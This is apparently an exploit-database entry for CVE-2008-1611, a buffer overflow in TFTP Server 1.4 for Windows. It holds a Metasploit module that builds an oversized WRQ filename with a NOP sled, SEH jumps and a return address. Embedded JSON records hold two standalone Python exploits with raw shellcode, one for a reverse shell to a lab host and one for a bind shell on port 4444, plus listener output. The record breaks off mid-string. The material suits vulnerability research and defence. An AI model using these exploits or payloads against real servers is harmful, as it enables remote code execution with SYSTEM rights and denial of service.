TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow
2012-04-20T00:00:00
ID EDB-ID:18759 Type exploitdb Reporter metasploit Modified 2012-04-20T00:00:00
Description
TFTP Server for Windows 1.4 ST WRQ Buffer Overflow. CVE-2008-1611. Remote exploit for the Windows platform.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Udp

  # Module metadata for the TFTP Server 1.4 ST WRQ filename overflow
  # (CVE-2008-1611).  Every target shares one 'Ret' value (the P/P/R
  # address the author took from tftpserversp.exe); only the 'Offset' --
  # the number of bytes placed in the filename field before the jump /
  # handler trailer -- differs between service and standalone launches.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    ret = 0x416801

    # [target name, offset]; author note: tested ok 19/04/12 on XP SP2/SP3
    # and Win7 SP0/SP1, other service packs / Vista are unverified.
    offset_table = [
      ['Windows XP SP2/SP3 EN Service Mode',         1203],
      ['Windows XP SP2/SP3 EN Standalone Mode',      1487],
      ['Windows 7 SP0/SP1 EN x64 Service Mode',      1217],
      ['Windows 7 SP0/SP1 EN x64 Standalone Mode',   1501],
      ['Windows 7 SP0/SP1 EN x86 Service Mode',      1223],
      ['Windows 7 SP0/SP1 EN x86 Standalone Mode',   1507]
    ]
    targets = offset_table.map do |name, offset|
      [name, { 'Ret' => ret, 'Offset' => offset }]
    end

    super(update_info(info,
      'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
      'Description' => %q{
This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw
is due to the way TFTP handles the filename parameter extracted from a WRQ request.
The server will append the user-supplied filename to TFTP server binary's path
without any bounds checking, and then attempt to open this with a fopen(). Since
this isn't a valid file path, fopen() returns null, which allows the corrupted
data to be used in a strcmp() function, causing an access violation.
Since the offset is sensitive to how the TFTP server is launched, you must know
in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'
, and then manually select your target accordingly. A successful attempt will lead
to remote code execution under the context of SYSTEM if run as a service, or
the user if run as a standalone. A failed attempt will result a denial-of-service.
},
      'Author' => [
        'Mati Aharoni', # initial discovery, PoC
        'Datacut'       # Metasploit module
      ],
      'References' => [
        ['CVE', '2008-1611'],
        ['OSVDB', '43785'],
        ['BID', '18345'],
        ['EDB', '5314']
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'seh'
      },
      'Payload' => {
        # Space 600 keeps the lead length positive for every offset above
        # (smallest is 1203 - 600 - 50 NOPs).
        'Space' => 600,
        'BadChars' => "\x00\x2f",
        'StackAdjustment' => -3500
      },
      'Platform' => 'win',
      'Targets' => targets,
      'Privileged' => false,
      'DisclosureDate' => 'Mar 26 2008',
      # index 4: 'Windows 7 SP0/SP1 EN x86 Service Mode' (service install).
      'DefaultTarget' => 4))

    register_options(
      [
        Opt::RPORT(69)
      ], self.class)
  end

  # Sends a single TFTP write request whose filename field carries the
  # overflow, then hands off to the payload handler.
  #
  # Defender note: the filename field built here is over 1200 bytes long
  # (target 'Offset' plus a 13-byte trailer), far beyond any legitimate
  # path, so length inspection of WRQ/RRQ filenames on UDP/69 is a simple
  # detection for this and the related RRQ variant.
  def exploit
    connect_udp

    udp_sock.put(wrq_packet(wrq_filename))

    handler
    disconnect_udp
  end

  private

  # Assembles the oversized filename: random lead + NOP sled + payload,
  # followed by the near jump (back 640 bytes into the sled), the short
  # jump (back 7 bytes onto the near jump) and the P/P/R address.
  #
  # @return [String] filename field of the WRQ
  def wrq_filename
    sled = make_nops(50)
    lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - sled.length)
    near = "\xe9\x80\xfd\xff\xff"
    nseh = "\xeb\xf9" + make_nops(2)

    lead + sled + payload.encoded + near + nseh + [target.ret].pack('V')
  end

  # Wraps a filename in a TFTP WRQ (opcode 2): opcode, filename, NUL,
  # transfer mode, NUL.
  #
  # @param filename [String] filename field
  # @return [String] raw datagram body
  def wrq_packet(filename)
    mode = "netascii"
    "\x00\x02" + filename + "\0" + mode + "\0"
  end
end
{"id": "EDB-ID:18759", "hash": "ef70087e664931dbbeeb128e455b1b9e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow", "description": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow. CVE-2008-1611. Remote exploit for windows platform", "published": "2012-04-20T00:00:00", "modified": "2012-04-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18759/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2008-1611"], "lastseen": "2016-02-02T10:23:57", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1611"]}, {"type": "exploitdb", "idList": ["EDB-ID:18345", "EDB-ID:5314"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112007"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/TFTP/TFTPSERVER_WRQ_BOF"]}], "modified": "2016-02-02T10:23:57"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18759/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tRank = NormalRanking\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in TFTP Server 1.4 ST. 
The flaw\r\n\t\t\t\tis due to the way TFTP handles the filename parameter extracted from a WRQ request.\r\n\t\t\t\tThe server will append the user-supplied filename to TFTP server binary's path\r\n\t\t\t\twithout any bounds checking, and then attempt to open this with a fopen(). Since\r\n\t\t\t\tthis isn't a valid file path, fopen() returns null, which allows the corrupted\r\n\t\t\t\tdata to be used in a strcmp() function, causing an access violation.\r\n\r\n\t\t\t\tSince the offset is sensitive to how the TFTP server is launched, you must know\r\n\t\t\t\tin advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\r\n\t\t\t\t, and then manually select your target accordingly. A successful attempt will lead\r\n\t\t\t\tto remote code execution under the context of SYSTEM if run as a service, or\r\n\t\t\t\tthe user if run as a standalone. A failed attempt will result a denial-of-service.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Mati Aharoni', #Initial discovery, PoC\r\n\t\t\t\t\t'Datacut' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-1611' ],\r\n\t\t\t\t\t[ 'OSVDB', '43785' ],\r\n\t\t\t\t\t[ 'BID', '18345' ],\r\n\t\t\t\t\t[ 'EDB', '5314' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' =>'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.\r\n\t\t\t\t\t# possible may work for other service packs and or vista\r\n\t\t\t\t\t# Rets = P/P/R from tftpserversp.exe\r\n\t\t\t\t\t[ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ],\r\n\t\t\t\t\t[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x64 
Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> false,\r\n\t\t\t'DisclosureDate'=> 'Mar 26 2008',\r\n\t\t\t'DefaultTarget' => 4)) #TFTP is installed as a service\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(69)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tnops = make_nops(50)\r\n\t\tlead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)\r\n\t\tnear = \"\\xe9\\x80\\xfd\\xff\\xff\" #jump back 640 bytes to the nop sled\r\n\t\tnseh = \"\\xeb\\xf9\" + make_nops(2) #jump back 7 bytes to the long jump\r\n\r\n\t\tevil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')\r\n\t\tmode = \"netascii\"\r\n\r\n\t\t#Send the WRQ packet (header \"\\x00\\x02\")\r\n\t\tsploit = \"\\x00\\x02\" + evil + \"\\0\" + mode +\"\\0\"\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["43785"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:50", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request.", "modified": "2017-09-28T21:30:47", "published": "2008-04-01T12:44:00", "id": "CVE-2008-1611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1611", "title": "CVE-2008-1611", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:34:14", "bulletinFamily": "exploit", "description": "TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit. CVE-2008-1611. Remote exploit for windows platform", "modified": "2012-01-10T00:00:00", "published": "2012-01-10T00:00:00", "id": "EDB-ID:18345", "href": "https://www.exploit-db.com/exploits/18345/", "type": "exploitdb", "title": "TFTP Server 1.4 - ST RRQ Buffer Overflow Exploit", "sourceData": "#!/usr/bin/python\r\n\r\n#---------------------------------------------------------------------------#\r\n# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #\r\n# OS: Windows XP PRO SP3 #\r\n# Author: b33f #\r\n#---------------------------------------------------------------------------#\r\n# Smashing the stack for fun and practise... #\r\n# #\r\n# This tftp service have been pwned extensively: #\r\n# (1) Muts ==> WRQ Overflow #\r\n# http://www.exploit-db.com/exploits/5314/ #\r\n# (2) Molotov ==> WRQ Overflow #\r\n# http://www.exploit-db.com/exploits/10542/ #\r\n# (3) tixxDZ ==> ERROR Overflow #\r\n# http://www.exploit-db.com/exploits/5563/ #\r\n# #\r\n#---------------------------------------------------------------------------#\r\n# After some simple fuzzing with spike I discovered that sending a Read #\r\n# Request (RRQ) packet can also trigger a buffer overflow... 
#\r\n#---------------------------------------------------------------------------#\r\n# It might take up to 30 seconds for some reason but the shell does appear #\r\n# as expected.... #\r\n# #\r\n# root@bt:~# nc -lvp 9988 #\r\n# listening on [any] 9988 ... #\r\n# 192.168.111.128: inverse host lookup failed: Unknown server error #\r\n# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 #\r\n# Microsoft Windows XP [Version 5.1.2600] #\r\n# (C) Copyright 1985-2001 Microsoft Corp. #\r\n# #\r\n# C:\\Program Files\\TFTPServer> #\r\n#---------------------------------------------------------------------------#\r\n\r\nimport socket\r\nimport sys\r\n\r\nhost = '192.168.111.128'\r\nport = 69\r\n\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n \r\nexcept:\r\n print \"socket() failed\"\r\n sys.exit(1)\r\n\r\n#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\\x00'\r\n#x86/shikata_ga_nai succeeded with size 341 (iteration=1)\r\nshell = 
(\r\n\"\\xbb\\x3c\\xef\\xdb\\xc5\\xdb\\xdd\\xd9\\x74\\x24\\xf4\\x5a\\x29\\xc9\\xb1\"\r\n\"\\x4f\\x31\\x5a\\x14\\x83\\xc2\\x04\\x03\\x5a\\x10\\xde\\x1a\\x27\\x2d\\x97\"\r\n\"\\xe5\\xd8\\xae\\xc7\\x6c\\x3d\\x9f\\xd5\\x0b\\x35\\xb2\\xe9\\x58\\x1b\\x3f\"\r\n\"\\x82\\x0d\\x88\\xb4\\xe6\\x99\\xbf\\x7d\\x4c\\xfc\\x8e\\x7e\\x61\\xc0\\x5d\"\r\n\"\\xbc\\xe0\\xbc\\x9f\\x91\\xc2\\xfd\\x6f\\xe4\\x03\\x39\\x8d\\x07\\x51\\x92\"\r\n\"\\xd9\\xba\\x45\\x97\\x9c\\x06\\x64\\x77\\xab\\x37\\x1e\\xf2\\x6c\\xc3\\x94\"\r\n\"\\xfd\\xbc\\x7c\\xa3\\xb6\\x24\\xf6\\xeb\\x66\\x54\\xdb\\xe8\\x5b\\x1f\\x50\"\r\n\"\\xda\\x28\\x9e\\xb0\\x13\\xd0\\x90\\xfc\\xff\\xef\\x1c\\xf1\\xfe\\x28\\x9a\"\r\n\"\\xea\\x75\\x43\\xd8\\x97\\x8d\\x90\\xa2\\x43\\x18\\x05\\x04\\x07\\xba\\xed\"\r\n\"\\xb4\\xc4\\x5c\\x65\\xba\\xa1\\x2b\\x21\\xdf\\x34\\xf8\\x59\\xdb\\xbd\\xff\"\r\n\"\\x8d\\x6d\\x85\\xdb\\x09\\x35\\x5d\\x42\\x0b\\x93\\x30\\x7b\\x4b\\x7b\\xec\"\r\n\"\\xd9\\x07\\x6e\\xf9\\x5b\\x4a\\xe7\\xce\\x51\\x75\\xf7\\x58\\xe2\\x06\\xc5\"\r\n\"\\xc7\\x58\\x81\\x65\\x8f\\x46\\x56\\x89\\xba\\x3e\\xc8\\x74\\x45\\x3e\\xc0\"\r\n\"\\xb2\\x11\\x6e\\x7a\\x12\\x1a\\xe5\\x7a\\x9b\\xcf\\xa9\\x2a\\x33\\xa0\\x09\"\r\n\"\\x9b\\xf3\\x10\\xe1\\xf1\\xfb\\x4f\\x11\\xfa\\xd1\\xf9\\x16\\x6d\\x1a\\x51\"\r\n\"\\xf7\\xea\\xf2\\xa0\\x07\\xd4\\x06\\x2c\\xe1\\x70\\x17\\x78\\xba\\xec\\x8e\"\r\n\"\\x21\\x30\\x8c\\x4f\\xfc\\xd0\\x2d\\xdd\\x9b\\x20\\x3b\\xfe\\x33\\x77\\x6c\"\r\n\"\\x30\\x4a\\x1d\\x80\\x6b\\xe4\\x03\\x59\\xed\\xcf\\x87\\x86\\xce\\xce\\x06\"\r\n\"\\x4a\\x6a\\xf5\\x18\\x92\\x73\\xb1\\x4c\\x4a\\x22\\x6f\\x3a\\x2c\\x9c\\xc1\"\r\n\"\\x94\\xe6\\x73\\x88\\x70\\x7e\\xb8\\x0b\\x06\\x7f\\x95\\xfd\\xe6\\xce\\x40\"\r\n\"\\xb8\\x19\\xfe\\x04\\x4c\\x62\\xe2\\xb4\\xb3\\xb9\\xa6\\xc5\\xf9\\xe3\\x8f\"\r\n\"\\x4d\\xa4\\x76\\x92\\x13\\x57\\xad\\xd1\\x2d\\xd4\\x47\\xaa\\xc9\\xc4\\x22\"\r\n\"\\xaf\\x96\\x42\\xdf\\xdd\\x87\\x26\\xdf\\x72\\xa7\\x62\")\r\n\r\n#---------------------------------------------------------------------------#\r\n# (1) Stage1: 
0x00409605 TFTPServer.exe - PPR #\r\n# => 3-byte overwrite using the mandatory protocol null-byte. #\r\n# (2) Stage2: jump back 5-bytes \"\\xEB\\xF9\" so we have room for a far jump. #\r\n# (3) Stage3: jump back 1490-bytes to the beginning of our buffer. #\r\n# (4) Stage4: reverse shell port 9988 - size 341 #\r\n#---------------------------------------------------------------------------#\r\n\r\nstage4 = \"\\x90\"*50 + shell\r\nstage3 = \"\\xE9\\x2E\\xFA\\xFF\\xFF\"\r\nstage2 = \"\\xEB\\xF9\\x90\\x90\"\r\nstage1 = \"\\x05\\x96\\x40\"\r\n\r\nfilename = stage4 + \"A\"*(1487-len(stage4)) + stage3 + stage2 + stage1\r\n\r\n\r\nmode = \"netascii\"\r\nyoulose = \"\\x00\\x01\" + filename + \"\\x00\" + mode + \"\\x00\"\r\ns.sendto(youlose, (host, port))", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18345/"}, {"lastseen": "2016-01-31T22:57:00", "bulletinFamily": "exploit", "description": "TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day). CVE-2008-1611. 
Remote exploit for windows platform", "modified": "2008-03-26T00:00:00", "published": "2008-03-26T00:00:00", "id": "EDB-ID:5314", "href": "https://www.exploit-db.com/exploits/5314/", "type": "exploitdb", "title": "TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit 0day", "sourceData": "#!/usr/bin/python\r\n# TFTP Server for Windows V1.4 ST (0day)\r\n# http://sourceforge.net/projects/tftp-server/\r\n# Tested on Windows Vista SP0.\r\n# Coded by Mati Aharoni\r\n# muts..at..offensive-security.com\r\n# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt\r\n##################################################################\r\n# bt ~ # sourceforge-tftpd.py\r\n# [*] TFTP Server for Windows V1.4 ST (0day)\r\n# [*] http://www.offensive-security.com\r\n# [*] Sending evil packet, ph33r\r\n# [*] Check port 4444 for bindshell\r\n# bt ~ # nc -v 172.16.167.134 4444\r\n# (UNKNOWN) [172.16.167.134] 4444 (krb524) open\r\n# Microsoft Windows [Version 6.0.6000]\r\n# Copyright (c) 2006 Microsoft Corporation. 
All \r\n# rights reserved.\r\n#\r\n# C:\\Windows\\system32>\r\n##################################################################\r\n\r\nimport socket\r\nimport sys\r\n\r\nprint \"[*] TFTP Server for Windows V1.4 ST (0day)\"\r\nprint \"[*] http://www.offensive-security.com\"\r\n\r\nhost = '172.16.167.134'\r\nport = 69\r\n\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nexcept:\r\n print \"socket() failed\"\r\n sys.exit(1)\r\n\r\n# Jump back shellcode\r\nsc = \"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x16\\x91\\x9c\"\r\nsc +=\"\\x30\\x83\\xeb\\xfc\\xe2\\xf4\\xcf\\x7f\\x45\\x44\\x32\\x65\\xc5\\xb0\\xd7\\x9b\"\r\nsc +=\"\\x0c\\xce\\xdb\\x6f\\x51\\xcf\\xf7\\x91\\x9c\\x30\"\r\n\r\n# windows/shell_bind_tcp - 317 bytes\r\n# http://www.metasploit.com\r\n# EXITFUNC=seh, LPORT=4444\r\n\r\nshell=(\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\"\r\n\"\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\"\r\n\"\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\"\r\n\"\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\"\r\n\"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\"\r\n\"\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\"\r\n\"\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\"\r\n\"\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\"\r\n\"\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\"\r\n\"\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53\"\r\n\"\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66\"\r\n\"\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\\xd6\\x6a\\x10\\x51\"\r\n\"\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0\"\r\n\"\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93\
"\r\n\"\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\"\r\n\"\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"\r\n\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\"\r\n\"\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\"\r\n\"\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\"\r\n\"\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\"\r\n\"\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\"\r\n\"\\xff\\xd0\")\r\n\r\nfilename = \"\\x90\"*860 + shell + \"\\x90\"*14 + sc + \"\\xeb\\xd0\\x90\\x90\" + \"\\x2b\\x0e\\x41\"\r\n\r\nmode = \"netascii\"\r\n\r\nmuha = \"\\x00\\x02\" + filename+ \"\\0\" + mode+ \"\\0\" \r\n\r\nprint \"[*] Sending evil packet, ph33r\"\r\ns.sendto(muha, (host, port))\r\nprint \"[*] Check port 4444 for bindshell\"\r\n\r\n# milw0rm.com [2008-03-26]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5314/"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:57", "bulletinFamily": "exploit", "description": "", "modified": "2012-04-20T00:00:00", "published": "2012-04-20T00:00:00", "href": "https://packetstormsecurity.com/files/112007/TFTP-Server-for-Windows-1.4-ST-WRQ-Buffer-Overflow.html", "id": "PACKETSTORM:112007", "type": "packetstorm", "title": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = NormalRanking \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw \nis due to the way TFTP handles the filename parameter extracted from a WRQ request. \nThe server will append the user-supplied filename to TFTP server binary's path \nwithout any bounds checking, and then attempt to open this with a fopen(). Since \nthis isn't a valid file path, fopen() returns null, which allows the corrupted \ndata to be used in a strcmp() function, causing an access violation. \n \nSince the offset is sensitive to how the TFTP server is launched, you must know \nin advance if your victim machine launched the TFTP as a 'Service' or 'Standalone' \n, and then manually select your target accordingly. A successful attempt will lead \nto remote code execution under the context of SYSTEM if run as a service, or \nthe user if run as a standalone. A failed attempt will result a denial-of-service. \n}, \n'Author' => \n[ \n'Mati Aharoni', #Initial discovery, PoC \n'Datacut' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2008-1611' ], \n[ 'OSVDB', '43785' ], \n[ 'BID', '18345' ], \n[ 'EDB', '5314' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' =>'seh', \n}, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x2f\", \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. 
\n# possible may work for other service packs and or vista \n# Rets = P/P/R from tftpserversp.exe \n[ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], \n[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], \n[ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], \n[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], \n[ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], \n[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ] \n], \n'Privileged' => false, \n'DisclosureDate'=> 'Mar 26 2008', \n'DefaultTarget' => 4)) #TFTP is installed as a service \n \nregister_options( \n[ \nOpt::RPORT(69) \n], self.class) \nend \n \n \ndef exploit \nconnect_udp \n \nnops = make_nops(50) \nlead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length) \nnear = \"\\xe9\\x80\\xfd\\xff\\xff\" #jump back 640 bytes to the nop sled \nnseh = \"\\xeb\\xf9\" + make_nops(2) #jump back 7 bytes to the long jump \n \nevil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V') \nmode = \"netascii\" \n \n#Send the WRQ packet (header \"\\x00\\x02\") \nsploit = \"\\x00\\x02\" + evil + \"\\0\" + mode +\"\\0\" \n \nudp_sock.put(sploit) \n \nhandler \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112007/tftpserver_wrq_bof.rb.txt"}], "metasploit": [{"lastseen": "2019-01-30T00:15:36", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw is due to the way TFTP handles the filename parameter extracted from a WRQ request. 
The server will append the user-supplied filename to TFTP server binary's path without any bounds checking, and then attempt to check this path with a fopen(). Since this isn't a valid file path, fopen() returns null, which allows the corrupted data to be used in a strcmp() function, causing an access violation. Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone' , and then manually select your target accordingly. A successful attempt will lead to remote code execution under the context of SYSTEM if run as a service, or the user if run as a standalone. A failed attempt will result a denial-of-service.", "modified": "2017-07-24T13:26:21", "published": "2012-04-20T01:23:19", "id": "MSF:EXPLOIT/WINDOWS/TFTP/TFTPSERVER_WRQ_BOF", "href": "", "type": "metasploit", "title": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability found in TFTP Server 1.4 ST. 
